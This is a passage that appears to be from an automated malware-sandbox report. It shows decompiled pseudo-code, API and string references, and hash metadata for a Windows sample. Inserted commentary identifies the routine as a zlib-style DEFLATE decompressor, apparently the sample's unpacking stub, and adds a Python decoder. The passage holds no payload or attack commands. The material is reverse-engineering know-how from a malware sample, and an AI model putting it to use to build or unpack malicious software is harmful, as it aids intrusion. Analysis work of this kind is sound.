                                                                        				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t111 - 4));
                                                                        				return 0;
                                                                        			}

                                                                        APIs
                                                                        • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00402230
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                        • API String ID: 123533781-1943935188
                                                                        • Opcode ID: 3c5799551ecf467b98758a7772b9f68a95bcaf766b99ab5d6102861f06629b87
                                                                        • Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
                                                                        • Opcode Fuzzy Hash: 3c5799551ecf467b98758a7772b9f68a95bcaf766b99ab5d6102861f06629b87
                                                                        • Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 79%
                                                                        			E00406945(signed int __ebx, signed int* __esi) {
                                                                        				signed int _t396;
                                                                        				signed int _t425;
                                                                        				signed int _t442;
                                                                        				signed int _t443;
                                                                        				signed int* _t446;
                                                                        				void* _t448;
                                                                        
                                                                        				L0:
                                                                        				while(1) {
                                                                        					L0:
                                                                        					_t446 = __esi;
                                                                        					_t425 = __ebx;
                                                                        					if( *(_t448 - 0x34) == 0) {
                                                                        						break;
                                                                        					}
                                                                        					L55:
                                                                        					__eax =  *(__ebp - 0x38);
                                                                        					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                        					__ecx = __ebx;
                                                                        					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                        					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                        					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                        					__ebx = __ebx + 8;
                                                                        					while(1) {
                                                                        						L56:
                                                                        						if(__ebx < 0xe) {
                                                                        							goto L0;
                                                                        						}
                                                                        						L57:
                                                                        						__eax =  *(__ebp - 0x40);
                                                                        						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                                        						__ecx = __eax;
                                                                        						__esi[1] = __eax;
                                                                        						__ecx = __eax & 0x0000001f;
                                                                        						if(__cl > 0x1d) {
                                                                        							L9:
                                                                        							_t443 = _t442 | 0xffffffff;
                                                                        							 *_t446 = 0x11;
                                                                        							L10:
                                                                        							_t446[0x147] =  *(_t448 - 0x40);
                                                                        							_t446[0x146] = _t425;
                                                                        							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                                        							L11:
                                                                        							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                                        							_t446[0x26ea] =  *(_t448 - 0x30);
                                                                        							E004070B4( *(_t448 + 8));
                                                                        							return _t443;
                                                                        						}
                                                                        						L58:
                                                                        						__eax = __eax & 0x000003e0;
                                                                        						if(__eax > 0x3a0) {
                                                                        							goto L9;
                                                                        						}
                                                                        						L59:
                                                                        						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                                        						__ebx = __ebx - 0xe;
                                                                        						_t94 =  &(__esi[2]);
                                                                        						 *_t94 = __esi[2] & 0x00000000;
                                                                        						 *__esi = 0xc;
                                                                        						while(1) {
                                                                        							L60:
                                                                        							__esi[1] = __esi[1] >> 0xa;
                                                                        							__eax = (__esi[1] >> 0xa) + 4;
                                                                        							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                        								goto L68;
                                                                        							}
                                                                        							L61:
                                                                        							while(1) {
                                                                        								L64:
                                                                        								if(__ebx >= 3) {
                                                                        									break;
                                                                        								}
                                                                        								L62:
                                                                        								if( *(__ebp - 0x34) == 0) {
                                                                        									goto L182;
                                                                        								}
                                                                        								L63:
                                                                        								__eax =  *(__ebp - 0x38);
                                                                        								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                        								__ecx = __ebx;
                                                                        								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                        								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                        								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                        								__ebx = __ebx + 8;
                                                                        							}
                                                                        							L65:
                                                                        							__ecx = __esi[2];
                                                                        							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                                        							__ebx = __ebx - 3;
                                                                        							_t108 = __ecx + 0x408408; // 0x121110
                                                                        							__ecx =  *_t108;
                                                                        							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                                        							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                                        							__ecx = __esi[1];
                                                                        							__esi[2] = __esi[2] + 1;
                                                                        							__eax = __esi[2];
                                                                        							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                                        							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                                        								goto L64;
                                                                        							}
                                                                        							L66:
                                                                        							while(1) {
                                                                        								L68:
                                                                        								if(__esi[2] >= 0x13) {
                                                                        									break;
                                                                        								}
                                                                        								L67:
                                                                        								_t119 = __esi[2] + 0x408408; // 0x4000300
                                                                        								__eax =  *_t119;
                                                                        								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                                        								_t126 =  &(__esi[2]);
                                                                        								 *_t126 = __esi[2] + 1;
                                                                        							}
                                                                        							L69:
                                                                        							__ecx = __ebp - 8;
                                                                        							__edi =  &(__esi[0x143]);
                                                                        							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                                        							__eax = 0;
                                                                        							 *(__ebp - 8) = 0;
                                                                        							__eax =  &(__esi[3]);
                                                                        							 *__edi = 7;
                                                                        							__eax = E0040711C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
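Editor's note on the listing above, added here and not part of the sandbox report: the block from label L63 to L69 reads `(table >> 10) + 4` three-bit values into slots chosen by a 19-entry order table (`0x408408`), zero-fills the remaining slots up to 19, sets `bb = 7` and calls a table builder on 19 code lengths, and the `switch` that follows walks states 1..7 testing the decoded entry's flag bits `0x10`, `0x40` and `0x20`. That is the shape of zlib's `inflate_blocks` (dynamic-Huffman header, `border[]` order) and `inflate_codes` (LEN, LENEXT, DIST, DISTEXT, COPY, LIT, WASH), so this routine is almost certainly a statically linked DEFLATE decompressor used by the sample's packer or stub rather than malware-specific logic; the report itself does not name it, so the identification is this editor's reading. The Python below is an added example, not code from the sample or the sandbox: a compact raw-DEFLATE decoder laid out in the same states, which lets an analyst confirm what such a routine produces by decoding a stream with it (the sample input, the `make_sample` generator and the use of zlib as the reference encoder are the editor's constructions).

```python
# Raw-DEFLATE (RFC 1951) decoder laid out like zlib's inflate_blocks/inflate_codes, which is what the
# routine above implements (this editor's reading). Editor-added example, not code from the sample.
import zlib

BORDER = [16, 17, 18, 0, 8, 7, 9, 6, 10, 5, 11, 4, 12, 3, 13, 2, 14, 1, 15]  # zlib's border[]
LEN_BASE = [3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 15, 17, 19, 23, 27, 31, 35, 43, 51, 59, 67, 83,
            99, 115, 131, 163, 195, 227, 258]                                  # codes 257..285
LEN_EXTRA = [0] * 8 + [1] * 4 + [2] * 4 + [3] * 4 + [4] * 4 + [5] * 4 + [0]
DIST_BASE = [1, 2, 3, 4, 5, 7, 9, 13, 17, 25, 33, 49, 65, 97, 129, 193, 257, 385, 513, 769,
             1025, 1537, 2049, 3073, 4097, 6145, 8193, 12289, 16385, 24577]    # codes 0..29
DIST_EXTRA = [0, 0, 0, 0] + [n // 2 for n in range(2, 28)]


class BitReader:  # LSB-first bit buffer; in the listing b=[ebp-0x40], k=ebx, p=[ebp-0x38], n=[ebp-0x34]
    def __init__(self, data):
        self.data, self.pos, self.buf, self.nbits = data, 0, 0, 0

    def bits(self, n):
        while self.nbits < n:                       # NEEDBITS: next input byte goes in above the held bits
            if self.pos >= len(self.data):
                raise ValueError("truncated stream")
            self.buf |= self.data[self.pos] << self.nbits
            self.pos, self.nbits = self.pos + 1, self.nbits + 8
        v = self.buf & ((1 << n) - 1)               # inflate_mask[n]
        self.buf, self.nbits = self.buf >> n, self.nbits - n   # DUMPBITS
        return v


def build_huffman(lengths):  # canonical Huffman table {(code_length, code): symbol}, RFC 1951 3.2.2
    table, code = {}, 0
    for length in range(1, 16):
        for sym, l in enumerate(lengths):
            if l == length:
                table[(length, code)] = sym
                code += 1
        code <<= 1
    return table


def decode_symbol(br, table):
    code = length = 0
    while length < 15:
        code, length = (code << 1) | br.bits(1), length + 1   # Huffman codes are packed MSB-first
        if (length, code) in table:
            return table[(length, code)]
    raise ValueError("invalid Huffman code")


def read_dynamic_trees(br):
    """Labels L63..L69 of the listing: read HCLEN+4 ((table >> 10) + 4) three-bit lengths into BORDER
    order, zero-fill to 19, build that table, then decode the HLIT+HDIST code lengths with it."""
    hlit, hdist, hclen = br.bits(5) + 257, br.bits(5) + 1, br.bits(4) + 4
    cl_lengths = [0] * 19
    for i in range(hclen):
        cl_lengths[BORDER[i]] = br.bits(3)
    cl_table, lengths = build_huffman(cl_lengths), []
    while len(lengths) < hlit + hdist:
        sym = decode_symbol(br, cl_table)
        if sym < 16:
            lengths.append(sym)
        elif sym == 16:                             # repeat the previous length 3..6 times
            lengths += [lengths[-1]] * (3 + br.bits(2))
        else:                                       # 17: 3..10 zeros, 18: 11..138 zeros
            lengths += [0] * (3 + br.bits(3) if sym == 17 else 11 + br.bits(7))
    return build_huffman(lengths[:hlit]), build_huffman(lengths[hlit:hlit + hdist]), lengths[:hlit]


def inflate_codes(br, lit_table, dist_table, out):
    """The switch cases 1..6 of the listing: LEN, LENEXT, DIST, DISTEXT, COPY, LIT."""
    while True:
        sym = decode_symbol(br, lit_table)                          # LEN
        if sym < 256:
            out.append(sym)                                         # LIT
        elif sym == 256:
            return                                                  # end of block (the 'e & 32' path)
        else:
            length = LEN_BASE[sym - 257] + br.bits(LEN_EXTRA[sym - 257])   # LENEXT (IndexError if > 285)
            d = decode_symbol(br, dist_table)                       # DIST
            dist = DIST_BASE[d] + br.bits(DIST_EXTRA[d])            # DISTEXT (IndexError if d > 29)
            if dist > len(out):
                raise ValueError("distance too far back")
            for _ in range(length):                                 # COPY: byte-wise so overlaps work
                out.append(out[-dist])


def inflate(data):  # decode a raw DEFLATE stream (no zlib/gzip framing) into bytes
    br, out = BitReader(data), bytearray()
    while True:
        bfinal, btype = br.bits(1), br.bits(2)
        if btype == 1:                                              # fixed trees, RFC 1951 3.2.6
            inflate_codes(br, build_huffman([8] * 144 + [9] * 112 + [7] * 24 + [8] * 8),
                          build_huffman([5] * 30), out)
        elif btype == 2:                                            # dynamic trees
            inflate_codes(br, *read_dynamic_trees(br)[:2], out)
        else:
            raise ValueError("stored or reserved block type not handled here")
        if bfinal:
            return bytes(out)


def raw_deflate(data, level=9):  # reference encoder: wbits=-15 makes zlib emit raw DEFLATE, no header
    c = zlib.compressobj(level, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


def make_sample(n=4000, seed=1):  # constructed input: LCG bytes over a skewed alphabet -> dynamic trees
    alphabet, x, out = b"aaaaaaabbcd", seed, bytearray()
    for _ in range(n):
        x = (x * 1103515245 + 12345) & 0x7FFFFFFF
        out.append(alphabet[(x >> 16) % 11])
    return bytes(out)
```

Usage: `inflate(raw_deflate(make_sample()))` round-trips the constructed input through zlib and back, and `read_dynamic_trees(BitReader(stream))` after consuming the three block-header bits exposes the literal/length code lengths, which is the state the listing has reached at label L69. When a sample's unpacking routine decodes like this, the practical next step is to locate its caller and dump the output buffer after the final block rather than to reverse the decoder itself.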
                                                                        							if(__eax != 0) {
                                                                        								L72:
                                                                        								 *__esi = 0x11;
                                                                        								while(1) {
                                                                        									L180:
                                                                        									_t396 =  *_t446;
                                                                        									if(_t396 > 0xf) {
                                                                        										break;
                                                                        									}
                                                                        									L1:
                                                                        									switch( *((intOrPtr*)(_t396 * 4 +  &M00407074))) {
                                                                        										case 0:
                                                                        											L101:
                                                                        											__eax = __esi[4] & 0x000000ff;
                                                                        											__esi[3] = __esi[4] & 0x000000ff;
                                                                        											__eax = __esi[5];
                                                                        											__esi[2] = __esi[5];
                                                                        											 *__esi = 1;
                                                                        											goto L102;
                                                                        										case 1:
                                                                        											L102:
                                                                        											__eax = __esi[3];
                                                                        											while(1) {
                                                                        												L105:
                                                                        												__eflags = __ebx - __eax;
                                                                        												if(__ebx >= __eax) {
                                                                        													break;
                                                                        												}
                                                                        												L103:
                                                                        												__eflags =  *(__ebp - 0x34);
                                                                        												if( *(__ebp - 0x34) == 0) {
                                                                        													goto L182;
                                                                        												}
                                                                        												L104:
                                                                        												__ecx =  *(__ebp - 0x38);
                                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                        												__ecx = __ebx;
                                                                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                        												__ebx = __ebx + 8;
                                                                        												__eflags = __ebx;
                                                                        											}
                                                                        											L106:
                                                                        											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
                                                                        											__eax = __eax &  *(__ebp - 0x40);
                                                                        											__ecx = __esi[2];
                                                                        											__eax = __esi[2] + __eax * 4;
                                                                        											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                        											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                        											__ecx =  *__eax & 0x000000ff;
                                                                        											__eflags = __ecx;
                                                                        											if(__ecx != 0) {
                                                                        												L108:
                                                                        												__eflags = __cl & 0x00000010;
                                                                        												if((__cl & 0x00000010) == 0) {
                                                                        													L110:
                                                                        													__eflags = __cl & 0x00000040;
                                                                        													if((__cl & 0x00000040) == 0) {
                                                                        														goto L125;
                                                                        													}
                                                                        													L111:
                                                                        													__eflags = __cl & 0x00000020;
                                                                        													if((__cl & 0x00000020) == 0) {
                                                                        														goto L9;
                                                                        													}
                                                                        													L112:
                                                                        													 *__esi = 7;
                                                                        													goto L180;
                                                                        												}
                                                                        												L109:
                                                                        												__esi[2] = __ecx;
                                                                        												__esi[1] = __eax;
                                                                        												 *__esi = 2;
                                                                        												goto L180;
                                                                        											}
                                                                        											L107:
                                                                        											__esi[2] = __eax;
                                                                        											 *__esi = 6;
                                                                        											goto L180;
                                                                        										case 2:
                                                                        											L113:
                                                                        											__eax = __esi[2];
                                                                        											while(1) {
                                                                        												L116:
                                                                        												__eflags = __ebx - __eax;
                                                                        												if(__ebx >= __eax) {
                                                                        													break;
                                                                        												}
                                                                        												L114:
                                                                        												__eflags =  *(__ebp - 0x34);
                                                                        												if( *(__ebp - 0x34) == 0) {
                                                                        													goto L182;
                                                                        												}
                                                                        												L115:
                                                                        												__ecx =  *(__ebp - 0x38);
                                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                        												__ecx = __ebx;
                                                                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                        												__ebx = __ebx + 8;
                                                                        												__eflags = __ebx;
                                                                        											}
                                                                        											L117:
                                                                        											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                        											__esi[1] = __esi[1] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                        											__ecx = __eax;
                                                                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                        											__ebx = __ebx - __eax;
                                                                        											__eflags = __ebx;
                                                                        											__eax = __esi[4] & 0x000000ff;
                                                                        											__esi[3] = __esi[4] & 0x000000ff;
                                                                        											__eax = __esi[6];
                                                                        											__esi[2] = __esi[6];
                                                                        											 *__esi = 3;
                                                                        											goto L118;
                                                                        										case 3:
                                                                        											L118:
                                                                        											__eax = __esi[3];
                                                                        											while(1) {
                                                                        												L121:
                                                                        												__eflags = __ebx - __eax;
                                                                        												if(__ebx >= __eax) {
                                                                        													break;
                                                                        												}
                                                                        												L119:
                                                                        												__eflags =  *(__ebp - 0x34);
                                                                        												if( *(__ebp - 0x34) == 0) {
                                                                        													goto L182;
                                                                        												}
                                                                        												L120:
                                                                        												__ecx =  *(__ebp - 0x38);
                                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                        												__ecx = __ebx;
                                                                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                        												__ebx = __ebx + 8;
                                                                        												__eflags = __ebx;
                                                                        											}
                                                                        											L122:
                                                                        											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
                                                                        											__eax = __eax &  *(__ebp - 0x40);
                                                                        											__ecx = __esi[2];
                                                                        											__eax = __esi[2] + __eax * 4;
                                                                        											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                        											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                        											__ecx =  *__eax & 0x000000ff;
                                                                        											__eflags = __cl & 0x00000010;
                                                                        											if((__cl & 0x00000010) == 0) {
                                                                        												L124:
                                                                        												__eflags = __cl & 0x00000040;
                                                                        												if((__cl & 0x00000040) != 0) {
                                                                        													goto L9;
                                                                        												}
                                                                        												L125:
                                                                        												__esi[3] = __ecx;
                                                                        												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                                        												__esi[2] = __eax;
                                                                        												goto L180;
                                                                        											}
                                                                        											L123:
                                                                        											__esi[2] = __ecx;
                                                                        											__esi[3] = __eax;
                                                                        											 *__esi = 4;
                                                                        											goto L180;
                                                                        										case 4:
                                                                        											L126:
                                                                        											__eax = __esi[2];
                                                                        											while(1) {
                                                                        												L129:
                                                                        												__eflags = __ebx - __eax;
                                                                        												if(__ebx >= __eax) {
                                                                        													break;
                                                                        												}
                                                                        												L127:
                                                                        												__eflags =  *(__ebp - 0x34);
                                                                        												if( *(__ebp - 0x34) == 0) {
                                                                        													goto L182;
                                                                        												}
                                                                        												L128:
                                                                        												__ecx =  *(__ebp - 0x38);
                                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                        												__ecx = __ebx;
                                                                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                        												__ebx = __ebx + 8;
                                                                        												__eflags = __ebx;
                                                                        											}
                                                                        											L130:
                                                                        											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                        											__esi[3] = __esi[3] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                        											__ecx = __eax;
                                                                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                        											__ebx = __ebx - __eax;
                                                                        											__eflags = __ebx;
                                                                        											 *__esi = 5;
                                                                        											goto L131;
                                                                        										case 5:
                                                                        											L131:
                                                                        											__eax =  *(__ebp - 0x30);
                                                                        											__edx = __esi[3];
                                                                        											__eax = __eax - __esi;
                                                                        											__ecx = __eax - __esi - 0x1ba0;
                                                                        											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                                        											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                                        												__ecx = __eax;
                                                                        												__ecx = __eax - __edx;
                                                                        												__eflags = __ecx;
                                                                        											} else {
                                                                        												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                                        												__ecx = __esi[0x26e8] - __edx - __esi;
                                                                        												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                                        											}
                                                                        											__eflags = __esi[1];
                                                                        											 *(__ebp - 0x20) = __ecx;
                                                                        											if(__esi[1] != 0) {
                                                                        												L135:
                                                                        												__edi =  *(__ebp - 0x2c);
                                                                        												do {
                                                                        													L136:
                                                                        													__eflags = __edi;
                                                                        													if(__edi != 0) {
                                                                        														goto L152;
                                                                        													}
                                                                        													L137:
                                                                        													__edi = __esi[0x26e8];
                                                                        													__eflags = __eax - __edi;
                                                                        													if(__eax != __edi) {
                                                                        														L143:
                                                                        														__esi[0x26ea] = __eax;
                                                                        														__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
                                                                        														__eax = __esi[0x26ea];
                                                                        														__ecx = __esi[0x26e9];
                                                                        														__eflags = __eax - __ecx;
                                                                        														 *(__ebp - 0x30) = __eax;
                                                                        														if(__eax >= __ecx) {
                                                                        															__edi = __esi[0x26e8];
                                                                        															__edi = __esi[0x26e8] - __eax;
                                                                        															__eflags = __edi;
                                                                        														} else {
                                                                        															__ecx = __ecx - __eax;
                                                                        															__edi = __ecx - __eax - 1;
                                                                        														}
                                                                        														__edx = __esi[0x26e8];
                                                                        														__eflags = __eax - __edx;
                                                                        														 *(__ebp - 8) = __edx;
                                                                        														if(__eax == __edx) {
                                                                        															__edx =  &(__esi[0x6e8]);
						__eflags = __ecx - __edx;
						if(__ecx != __edx) {
							__eax = __edx;
							__eflags = __eax - __ecx;
							 *(__ebp - 0x30) = __eax;
							if(__eax >= __ecx) {
								__edi =  *(__ebp - 8);
								__edi =  *(__ebp - 8) - __eax;
								__eflags = __edi;
							} else {
								__ecx = __ecx - __eax;
								__edi = __ecx;
							}
						}
					}
					__eflags = __edi;
					if(__edi == 0) {
						goto L183;
					} else {
						goto L152;
					}
				}
				L138:
				__ecx = __esi[0x26e9];
				__edx =  &(__esi[0x6e8]);
				__eflags = __ecx - __edx;
				if(__ecx == __edx) {
					goto L143;
				}
				L139:
				__eax = __edx;
				__eflags = __eax - __ecx;
				if(__eax >= __ecx) {
					__edi = __edi - __eax;
					__eflags = __edi;
				} else {
					__ecx = __ecx - __eax;
					__edi = __ecx;
				}
				__eflags = __edi;
				if(__edi == 0) {
					goto L143;
				}
				L152:
				__ecx =  *(__ebp - 0x20);
				 *__eax =  *__ecx;
				__eax = __eax + 1;
				__ecx = __ecx + 1;
				__edi = __edi - 1;
				__eflags = __ecx - __esi[0x26e8];
				 *(__ebp - 0x30) = __eax;
				 *(__ebp - 0x20) = __ecx;
				 *(__ebp - 0x2c) = __edi;
				if(__ecx == __esi[0x26e8]) {
					__ecx =  &(__esi[0x6e8]);
					 *(__ebp - 0x20) =  &(__esi[0x6e8]);
				}
				_t357 =  &(__esi[1]);
				 *_t357 = __esi[1] - 1;
				__eflags =  *_t357;
			} while ( *_t357 != 0);
		}
		goto L23;
	case 6:
		L156:
		__eax =  *(__ebp - 0x2c);
		__edi =  *(__ebp - 0x30);
		__eflags = __eax;
		if(__eax != 0) {
			L172:
			__cl = __esi[2];
			 *__edi = __cl;
			__edi = __edi + 1;
			__eax = __eax - 1;
			 *(__ebp - 0x30) = __edi;
			 *(__ebp - 0x2c) = __eax;
			goto L23;
		}
		L157:
		__ecx = __esi[0x26e8];
		__eflags = __edi - __ecx;
		if(__edi != __ecx) {
			L163:
			__esi[0x26ea] = __edi;
			__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
			__edi = __esi[0x26ea];
			__ecx = __esi[0x26e9];
			__eflags = __edi - __ecx;
			 *(__ebp - 0x30) = __edi;
			if(__edi >= __ecx) {
				__eax = __esi[0x26e8];
				__eax = __esi[0x26e8] - __edi;
				__eflags = __eax;
			} else {
				__ecx = __ecx - __edi;
				__eax = __ecx - __edi - 1;
			}
			__edx = __esi[0x26e8];
			__eflags = __edi - __edx;
			 *(__ebp - 8) = __edx;
			if(__edi == __edx) {
				__edx =  &(__esi[0x6e8]);
				__eflags = __ecx - __edx;
				if(__ecx != __edx) {
					__edi = __edx;
					__eflags = __edi - __ecx;
					 *(__ebp - 0x30) = __edi;
					if(__edi >= __ecx) {
						__eax =  *(__ebp - 8);
						__eax =  *(__ebp - 8) - __edi;
						__eflags = __eax;
					} else {
						__ecx = __ecx - __edi;
						__eax = __ecx;
					}
				}
			}
			__eflags = __eax;
			if(__eax == 0) {
				goto L183;
			} else {
				goto L172;
			}
		}
		L158:
		__eax = __esi[0x26e9];
		__edx =  &(__esi[0x6e8]);
		__eflags = __eax - __edx;
		if(__eax == __edx) {
			goto L163;
		}
		L159:
		__edi = __edx;
		__eflags = __edi - __eax;
		if(__edi >= __eax) {
			__ecx = __ecx - __edi;
			__eflags = __ecx;
			__eax = __ecx;
		} else {
			__eax = __eax - __edi;
			__eax = __eax - 1;
		}
		__eflags = __eax;
		if(__eax != 0) {
			goto L172;
		} else {
			goto L163;
		}
	case 7:
		L173:
		__eflags = __ebx - 7;
		if(__ebx > 7) {
			__ebx = __ebx - 8;
			 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
			_t380 = __ebp - 0x38;
			 *_t380 =  *(__ebp - 0x38) - 1;
			__eflags =  *_t380;
		}
		goto L175;
	case 8:
		L4:
		while(_t425 < 3) {
			if( *(_t448 - 0x34) == 0) {
				goto L182;
			} else {
				 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
				 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
				 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
				_t425 = _t425 + 8;
				continue;
			}
		}
		_t425 = _t425 - 3;
		 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
		_t406 =  *(_t448 - 0x40) & 0x00000007;
		asm("sbb ecx, ecx");
		_t408 = _t406 >> 1;
		_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
		if(_t408 == 0) {
			L24:
			 *_t446 = 9;
			_t436 = _t425 & 0x00000007;
			 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
			_t425 = _t425 - _t436;
			goto L180;
		}
		L6:
		_t411 = _t408 - 1;
		if(_t411 == 0) {
			L13:
			__eflags =  *0x42e3a8;
			if( *0x42e3a8 != 0) {
				L22:
				_t412 =  *0x40a42c; // 0x9
				_t446[4] = _t412;
				_t413 =  *0x40a430; // 0x5
				_t446[4] = _t413;
				_t414 =  *0x42d224; // 0x0
				_t446[5] = _t414;
				_t415 =  *0x42d220; // 0x0
				_t446[6] = _t415;
				L23:
				 *_t446 =  *_t446 & 0x00000000;
				goto L180;
			} else {
				_t26 = _t448 - 8;
				 *_t26 =  *(_t448 - 8) & 0x00000000;
				__eflags =  *_t26;
				_t416 = 0x42d228;
				goto L15;
				L20:
				 *_t416 = _t438;
				_t416 = _t416 + 4;
				__eflags = _t416 - 0x42d6a8;
				if(_t416 < 0x42d6a8) {
					L15:
					__eflags = _t416 - 0x42d464;
					_t438 = 8;
					if(_t416 > 0x42d464) {
						__eflags = _t416 - 0x42d628;
						if(_t416 >= 0x42d628) {
							__eflags = _t416 - 0x42d688;
							if(_t416 < 0x42d688) {
								_t438 = 7;
							}
						} else {
							_t438 = 9;
						}
					}
					goto L20;
				} else {
					E0040711C(0x42d228, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d224, 0x40a42c, 0x42db28, _t448 - 8);
					_push(0x1e);
					_pop(_t440);
					_push(5);
					_pop(_t419);
					memset(0x42d228, _t419, _t440 << 2);
					_t450 = _t450 + 0xc;
					_t442 = 0x42d228 + _t440;
